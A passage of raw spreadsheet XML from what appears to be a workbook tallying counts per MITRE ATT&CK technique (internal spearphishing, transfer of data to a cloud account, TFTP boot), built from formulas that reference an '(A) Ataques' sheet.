      <c r="BL80" s="471">
        <f>'(A) Ataques'!OP80+'(A) Ataques'!OV80+'(A) Ataques'!PB80+'(A) Ataques'!PH80+'(A) Ataques'!PN80</f>
        <v>2</v>
      </c>
      <c r="BM80" s="495">
        <f>'(A) Ataques'!OH80</f>
        <v>2</v>
      </c>
      <c r="BN80" s="331">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($BJ80=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO80" s="469">
        <f>IF('(A) Ataques'!$AP80&lt;&gt;"NO",'(A) Ataques'!OC80,"")</f>
        <v>3</v>
      </c>
      <c r="BP80" s="510">
        <f>IF('(A) Ataques'!$AP80&lt;&gt;"NO",'(A) Ataques'!OD80,"")</f>
        <v>3</v>
      </c>
      <c r="BQ80" s="471">
        <f>IF('(A) Ataques'!$AP80&lt;&gt;"NO",'(A) Ataques'!OE80,"")</f>
        <v>2</v>
      </c>
      <c r="BR80" s="471">
        <f>IF('(A) Ataques'!$AP80&lt;&gt;"NO",'(A) Ataques'!OF80,"")</f>
        <v>1</v>
      </c>
      <c r="BS80" s="471">
        <f>IF('(A) Ataques'!$AP80&lt;&gt;"NO",'(A) Ataques'!OJ80,"")</f>
        <v>2</v>
      </c>
      <c r="BT80" s="331">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($BO80=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="81" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A81" s="79">
        <f t="shared" si="1"/>
        <v>79</v>
      </c>
      <c r="B81" s="4">
        <f>IF('(A) Ataques'!AK81&lt;&gt;"NO",'(A) Ataques'!E81,"")</f>
        <v>50</v>
      </c>
      <c r="C81" s="6" t="str">
        <f>IF('(A) Ataques'!AK81&lt;&gt;"NO",IF('(A) Ataques'!M81="","",'(A) Ataques'!M81),"")</f>
        <v>T1534-Internal_spearphishing</v>
      </c>
      <c r="D81" s="4" t="str">
        <f>IF('(A) Ataques'!AK81&lt;&gt;"NO",'(A) Ataques'!F81,"")</f>
        <v>T1534</v>
      </c>
      <c r="E81" s="286">
        <f>IF('(A) Ataques'!AK81&lt;&gt;"NO",'(A) Ataques'!AQ81,"")</f>
        <v>10</v>
      </c>
      <c r="F81" s="288">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!BB81,"")</f>
        <v>12</v>
      </c>
      <c r="G81" s="392">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!BD81,"")</f>
        <v>8</v>
      </c>
      <c r="H81" s="4">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!BF81,"")</f>
        <v>3</v>
      </c>
      <c r="I81" s="20">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!BG81,"")</f>
        <v>5</v>
      </c>
      <c r="J81" s="530">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($F81=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K81" s="322">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BH81,"")</f>
        <v>0</v>
      </c>
      <c r="L81" s="322">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BJ81,"")</f>
        <v>0</v>
      </c>
      <c r="M81" s="4">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BL81,"")</f>
        <v>0</v>
      </c>
      <c r="N81" s="20">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BM81,"")</f>
        <v>0</v>
      </c>
      <c r="O81" s="532">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($K81=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P81" s="292">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BN81,"")</f>
        <v>12</v>
      </c>
      <c r="Q81" s="322">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BP81,"")</f>
        <v>8</v>
      </c>
      <c r="R81" s="4">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BR81,"")</f>
        <v>3</v>
      </c>
      <c r="S81" s="20">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BS81,"")</f>
        <v>5</v>
      </c>
      <c r="T81" s="530">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($P81=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U81" s="322">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BT81,"")</f>
        <v>34</v>
      </c>
      <c r="V81" s="322">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BV81,"")</f>
        <v>13</v>
      </c>
      <c r="W81" s="4">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BX81,"")</f>
        <v>8</v>
      </c>
      <c r="X81" s="20">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$BY81,"")</f>
        <v>6</v>
      </c>
      <c r="Y81" s="532">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($U81=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z81" s="288">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!BZ81,"")</f>
        <v>9</v>
      </c>
      <c r="AA81" s="392">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!CB81,"")</f>
        <v>7</v>
      </c>
      <c r="AB81" s="4">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!CD81,"")</f>
        <v>3</v>
      </c>
      <c r="AC81" s="20">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!CE81,"")</f>
        <v>4</v>
      </c>
      <c r="AD81" s="331">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF(Z81=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE81" s="322">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CF81,"")</f>
        <v>43</v>
      </c>
      <c r="AF81" s="322">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CH81,"")</f>
        <v>20</v>
      </c>
      <c r="AG81" s="4">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CJ81,"")</f>
        <v>11</v>
      </c>
      <c r="AH81" s="20">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CK81,"")</f>
        <v>9</v>
      </c>
      <c r="AI81" s="287">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($AE81=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ81" s="292">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CL81,"")</f>
        <v>0</v>
      </c>
      <c r="AK81" s="322">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CN81,"")</f>
        <v>0</v>
      </c>
      <c r="AL81" s="4">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CP81,"")</f>
        <v>0</v>
      </c>
      <c r="AM81" s="20">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CQ81,"")</f>
        <v>0</v>
      </c>
      <c r="AN81" s="331">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($AJ81=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO81" s="322">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CR81,"")</f>
        <v>19</v>
      </c>
      <c r="AP81" s="322">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CT81,"")</f>
        <v>3</v>
      </c>
      <c r="AQ81" s="4">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CV81,"")</f>
        <v>3</v>
      </c>
      <c r="AR81" s="20">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!$CW81,"")</f>
        <v>3</v>
      </c>
      <c r="AS81" s="287">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($AO81=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT81" s="288">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!CX81,"")</f>
        <v>31</v>
      </c>
      <c r="AU81" s="392">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!CZ81,"")</f>
        <v>11</v>
      </c>
      <c r="AV81" s="4">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!DB81,"")</f>
        <v>6</v>
      </c>
      <c r="AW81" s="20">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",'(A) Ataques'!DC81,"")</f>
        <v>6</v>
      </c>
      <c r="AX81" s="331">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($AT81=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY81" s="469">
        <f>'(A) Ataques'!LU81+'(A) Ataques'!MA81+'(A) Ataques'!MG81+'(A) Ataques'!MM81+'(A) Ataques'!MS81</f>
        <v>0</v>
      </c>
      <c r="AZ81" s="510">
        <f>'(A) Ataques'!LW81+'(A) Ataques'!MC81+'(A) Ataques'!MI81+'(A) Ataques'!MO81+'(A) Ataques'!MU81</f>
        <v>0</v>
      </c>
      <c r="BA81" s="471">
        <f>'(A) Ataques'!LY81+'(A) Ataques'!ME81+'(A) Ataques'!MK81+'(A) Ataques'!MQ81+'(A) Ataques'!MW81</f>
        <v>0</v>
      </c>
      <c r="BB81" s="471">
        <f>'(A) Ataques'!LQ81</f>
        <v>0</v>
      </c>
      <c r="BC81" s="331">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($AY81=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD81" s="469">
        <f>IF('(A) Ataques'!$AP81&lt;&gt;"NO",'(A) Ataques'!LL81,"")</f>
        <v>10</v>
      </c>
      <c r="BE81" s="510">
        <f>IF('(A) Ataques'!$AP81&lt;&gt;"NO",'(A) Ataques'!LM81,"")</f>
        <v>10</v>
      </c>
      <c r="BF81" s="471">
        <f>IF('(A) Ataques'!$AP81&lt;&gt;"NO",'(A) Ataques'!LN81,"")</f>
        <v>0</v>
      </c>
      <c r="BG81" s="471">
        <f>IF('(A) Ataques'!$AP81&lt;&gt;"NO",'(A) Ataques'!LO81,"")</f>
        <v>4</v>
      </c>
      <c r="BH81" s="471">
        <f>IF('(A) Ataques'!$AP81&lt;&gt;"NO",'(A) Ataques'!LS81,"")</f>
        <v>10</v>
      </c>
      <c r="BI81" s="331">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($BD81=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ81" s="469">
        <f>'(A) Ataques'!OL81+'(A) Ataques'!OR81+'(A) Ataques'!OX81+'(A) Ataques'!PD81+'(A) Ataques'!PJ81</f>
        <v>0</v>
      </c>
      <c r="BK81" s="510">
        <f>'(A) Ataques'!ON81+'(A) Ataques'!OT81+'(A) Ataques'!OZ81+'(A) Ataques'!PF81+'(A) Ataques'!PL81</f>
        <v>0</v>
      </c>
      <c r="BL81" s="471">
        <f>'(A) Ataques'!OP81+'(A) Ataques'!OV81+'(A) Ataques'!PB81+'(A) Ataques'!PH81+'(A) Ataques'!PN81</f>
        <v>0</v>
      </c>
      <c r="BM81" s="495">
        <f>'(A) Ataques'!OH81</f>
        <v>0</v>
      </c>
      <c r="BN81" s="331">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($BJ81=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO81" s="469">
        <f>IF('(A) Ataques'!$AP81&lt;&gt;"NO",'(A) Ataques'!OC81,"")</f>
        <v>0</v>
      </c>
      <c r="BP81" s="510">
        <f>IF('(A) Ataques'!$AP81&lt;&gt;"NO",'(A) Ataques'!OD81,"")</f>
        <v>0</v>
      </c>
      <c r="BQ81" s="471">
        <f>IF('(A) Ataques'!$AP81&lt;&gt;"NO",'(A) Ataques'!OE81,"")</f>
        <v>0</v>
      </c>
      <c r="BR81" s="471">
        <f>IF('(A) Ataques'!$AP81&lt;&gt;"NO",'(A) Ataques'!OF81,"")</f>
        <v>0</v>
      </c>
      <c r="BS81" s="471">
        <f>IF('(A) Ataques'!$AP81&lt;&gt;"NO",'(A) Ataques'!OJ81,"")</f>
        <v>0</v>
      </c>
      <c r="BT81" s="331">
        <f>IF('(A) Ataques'!$AK81&lt;&gt;"NO",IF($BO81=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="82" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A82" s="79">
        <f t="shared" si="1"/>
        <v>80</v>
      </c>
      <c r="B82" s="4">
        <f>IF('(A) Ataques'!AK82&lt;&gt;"NO",'(A) Ataques'!E82,"")</f>
        <v>51</v>
      </c>
      <c r="C82" s="6" t="str">
        <f>IF('(A) Ataques'!AK82&lt;&gt;"NO",IF('(A) Ataques'!M82="","",'(A) Ataques'!M82),"")</f>
        <v>T1537-Transfer_Data_to_Cloud_Account</v>
      </c>
      <c r="D82" s="4" t="str">
        <f>IF('(A) Ataques'!AK82&lt;&gt;"NO",'(A) Ataques'!F82,"")</f>
        <v>T1537</v>
      </c>
      <c r="E82" s="286">
        <f>IF('(A) Ataques'!AK82&lt;&gt;"NO",'(A) Ataques'!AQ82,"")</f>
        <v>76</v>
      </c>
      <c r="F82" s="288">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!BB82,"")</f>
        <v>25</v>
      </c>
      <c r="G82" s="392">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!BD82,"")</f>
        <v>25</v>
      </c>
      <c r="H82" s="4">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!BF82,"")</f>
        <v>4</v>
      </c>
      <c r="I82" s="20">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!BG82,"")</f>
        <v>8</v>
      </c>
      <c r="J82" s="530">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($F82=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K82" s="322">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BH82,"")</f>
        <v>0</v>
      </c>
      <c r="L82" s="322">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BJ82,"")</f>
        <v>0</v>
      </c>
      <c r="M82" s="4">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BL82,"")</f>
        <v>0</v>
      </c>
      <c r="N82" s="20">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BM82,"")</f>
        <v>0</v>
      </c>
      <c r="O82" s="532">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($K82=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P82" s="292">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BN82,"")</f>
        <v>25</v>
      </c>
      <c r="Q82" s="322">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BP82,"")</f>
        <v>25</v>
      </c>
      <c r="R82" s="4">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BR82,"")</f>
        <v>4</v>
      </c>
      <c r="S82" s="20">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BS82,"")</f>
        <v>8</v>
      </c>
      <c r="T82" s="530">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($P82=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U82" s="322">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BT82,"")</f>
        <v>33</v>
      </c>
      <c r="V82" s="322">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BV82,"")</f>
        <v>33</v>
      </c>
      <c r="W82" s="4">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BX82,"")</f>
        <v>6</v>
      </c>
      <c r="X82" s="20">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$BY82,"")</f>
        <v>13</v>
      </c>
      <c r="Y82" s="532">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($U82=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z82" s="288">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!BZ82,"")</f>
        <v>17</v>
      </c>
      <c r="AA82" s="392">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!CB82,"")</f>
        <v>17</v>
      </c>
      <c r="AB82" s="4">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!CD82,"")</f>
        <v>5</v>
      </c>
      <c r="AC82" s="20">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!CE82,"")</f>
        <v>13</v>
      </c>
      <c r="AD82" s="331">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF(Z82=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE82" s="322">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CF82,"")</f>
        <v>50</v>
      </c>
      <c r="AF82" s="322">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CH82,"")</f>
        <v>50</v>
      </c>
      <c r="AG82" s="4">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CJ82,"")</f>
        <v>11</v>
      </c>
      <c r="AH82" s="20">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CK82,"")</f>
        <v>20</v>
      </c>
      <c r="AI82" s="287">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($AE82=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ82" s="292">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CL82,"")</f>
        <v>0</v>
      </c>
      <c r="AK82" s="322">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CN82,"")</f>
        <v>0</v>
      </c>
      <c r="AL82" s="4">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CP82,"")</f>
        <v>0</v>
      </c>
      <c r="AM82" s="20">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CQ82,"")</f>
        <v>0</v>
      </c>
      <c r="AN82" s="331">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($AJ82=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO82" s="322">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CR82,"")</f>
        <v>5</v>
      </c>
      <c r="AP82" s="322">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CT82,"")</f>
        <v>5</v>
      </c>
      <c r="AQ82" s="4">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CV82,"")</f>
        <v>1</v>
      </c>
      <c r="AR82" s="20">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!$CW82,"")</f>
        <v>5</v>
      </c>
      <c r="AS82" s="287">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($AO82=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT82" s="288">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!CX82,"")</f>
        <v>30</v>
      </c>
      <c r="AU82" s="392">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!CZ82,"")</f>
        <v>30</v>
      </c>
      <c r="AV82" s="4">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!DB82,"")</f>
        <v>5</v>
      </c>
      <c r="AW82" s="20">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",'(A) Ataques'!DC82,"")</f>
        <v>13</v>
      </c>
      <c r="AX82" s="331">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($AT82=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY82" s="469">
        <f>'(A) Ataques'!LU82+'(A) Ataques'!MA82+'(A) Ataques'!MG82+'(A) Ataques'!MM82+'(A) Ataques'!MS82</f>
        <v>8</v>
      </c>
      <c r="AZ82" s="510">
        <f>'(A) Ataques'!LW82+'(A) Ataques'!MC82+'(A) Ataques'!MI82+'(A) Ataques'!MO82+'(A) Ataques'!MU82</f>
        <v>8</v>
      </c>
      <c r="BA82" s="471">
        <f>'(A) Ataques'!LY82+'(A) Ataques'!ME82+'(A) Ataques'!MK82+'(A) Ataques'!MQ82+'(A) Ataques'!MW82</f>
        <v>1</v>
      </c>
      <c r="BB82" s="471">
        <f>'(A) Ataques'!LQ82</f>
        <v>8</v>
      </c>
      <c r="BC82" s="331">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($AY82=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD82" s="469">
        <f>IF('(A) Ataques'!$AP82&lt;&gt;"NO",'(A) Ataques'!LL82,"")</f>
        <v>83</v>
      </c>
      <c r="BE82" s="510">
        <f>IF('(A) Ataques'!$AP82&lt;&gt;"NO",'(A) Ataques'!LM82,"")</f>
        <v>83</v>
      </c>
      <c r="BF82" s="471">
        <f>IF('(A) Ataques'!$AP82&lt;&gt;"NO",'(A) Ataques'!LN82,"")</f>
        <v>1</v>
      </c>
      <c r="BG82" s="471">
        <f>IF('(A) Ataques'!$AP82&lt;&gt;"NO",'(A) Ataques'!LO82,"")</f>
        <v>5</v>
      </c>
      <c r="BH82" s="471">
        <f>IF('(A) Ataques'!$AP82&lt;&gt;"NO",'(A) Ataques'!LS82,"")</f>
        <v>75</v>
      </c>
      <c r="BI82" s="331">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($BD82=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ82" s="469">
        <f>'(A) Ataques'!OL82+'(A) Ataques'!OR82+'(A) Ataques'!OX82+'(A) Ataques'!PD82+'(A) Ataques'!PJ82</f>
        <v>6</v>
      </c>
      <c r="BK82" s="510">
        <f>'(A) Ataques'!ON82+'(A) Ataques'!OT82+'(A) Ataques'!OZ82+'(A) Ataques'!PF82+'(A) Ataques'!PL82</f>
        <v>6</v>
      </c>
      <c r="BL82" s="471">
        <f>'(A) Ataques'!OP82+'(A) Ataques'!OV82+'(A) Ataques'!PB82+'(A) Ataques'!PH82+'(A) Ataques'!PN82</f>
        <v>1</v>
      </c>
      <c r="BM82" s="495">
        <f>'(A) Ataques'!OH82</f>
        <v>6</v>
      </c>
      <c r="BN82" s="331">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($BJ82=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO82" s="469">
        <f>IF('(A) Ataques'!$AP82&lt;&gt;"NO",'(A) Ataques'!OC82,"")</f>
        <v>6</v>
      </c>
      <c r="BP82" s="510">
        <f>IF('(A) Ataques'!$AP82&lt;&gt;"NO",'(A) Ataques'!OD82,"")</f>
        <v>6</v>
      </c>
      <c r="BQ82" s="471">
        <f>IF('(A) Ataques'!$AP82&lt;&gt;"NO",'(A) Ataques'!OE82,"")</f>
        <v>1</v>
      </c>
      <c r="BR82" s="471">
        <f>IF('(A) Ataques'!$AP82&lt;&gt;"NO",'(A) Ataques'!OF82,"")</f>
        <v>1</v>
      </c>
      <c r="BS82" s="471">
        <f>IF('(A) Ataques'!$AP82&lt;&gt;"NO",'(A) Ataques'!OJ82,"")</f>
        <v>6</v>
      </c>
      <c r="BT82" s="331">
        <f>IF('(A) Ataques'!$AK82&lt;&gt;"NO",IF($BO82=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="83" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A83" s="79">
        <f t="shared" si="1"/>
        <v>81</v>
      </c>
      <c r="B83" s="4">
        <f>IF('(A) Ataques'!AK83&lt;&gt;"NO",'(A) Ataques'!E83,"")</f>
        <v>52</v>
      </c>
      <c r="C83" s="6" t="str">
        <f>IF('(A) Ataques'!AK83&lt;&gt;"NO",IF('(A) Ataques'!M83="","",'(A) Ataques'!M83),"")</f>
        <v>T1542.005-TFTP_Boot</v>
      </c>
      <c r="D83" s="4" t="str">
        <f>IF('(A) Ataques'!AK83&lt;&gt;"NO",'(A) Ataques'!F83,"")</f>
        <v>T1542</v>
      </c>
      <c r="E83" s="286">
        <f>IF('(A) Ataques'!AK83&lt;&gt;"NO",'(A) Ataques'!AQ83,"")</f>
        <v>13</v>
      </c>
      <c r="F83" s="288">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!BB83,"")</f>
        <v>14</v>
      </c>
      <c r="G83" s="392">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!BD83,"")</f>
        <v>3</v>
      </c>
      <c r="H83" s="4">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!BF83,"")</f>
        <v>3</v>
      </c>
      <c r="I83" s="20">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!BG83,"")</f>
        <v>2</v>
      </c>
      <c r="J83" s="530">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($F83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K83" s="322">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BH83,"")</f>
        <v>98</v>
      </c>
      <c r="L83" s="322">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BJ83,"")</f>
        <v>6</v>
      </c>
      <c r="M83" s="4">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BL83,"")</f>
        <v>5</v>
      </c>
      <c r="N83" s="20">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BM83,"")</f>
        <v>3</v>
      </c>
      <c r="O83" s="532">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($K83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P83" s="292">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BN83,"")</f>
        <v>112</v>
      </c>
      <c r="Q83" s="322">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BP83,"")</f>
        <v>9</v>
      </c>
      <c r="R83" s="4">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BR83,"")</f>
        <v>8</v>
      </c>
      <c r="S83" s="20">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BS83,"")</f>
        <v>4</v>
      </c>
      <c r="T83" s="530">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($P83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U83" s="322">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BT83,"")</f>
        <v>1699</v>
      </c>
      <c r="V83" s="322">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BV83,"")</f>
        <v>21</v>
      </c>
      <c r="W83" s="4">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BX83,"")</f>
        <v>19</v>
      </c>
      <c r="X83" s="20">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!$BY83,"")</f>
        <v>7</v>
      </c>
      <c r="Y83" s="532">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF($U83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z83" s="288">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!BZ83,"")</f>
        <v>3410</v>
      </c>
      <c r="AA83" s="392">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!CB83,"")</f>
        <v>20</v>
      </c>
      <c r="AB83" s="4">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!CD83,"")</f>
        <v>12</v>
      </c>
      <c r="AC83" s="20">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",'(A) Ataques'!CE83,"")</f>
        <v>8</v>
      </c>
      <c r="AD83" s="331">
        <f>IF('(A) Ataques'!$AK83&lt;&gt;"NO",IF(Z83=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE83" s="322">
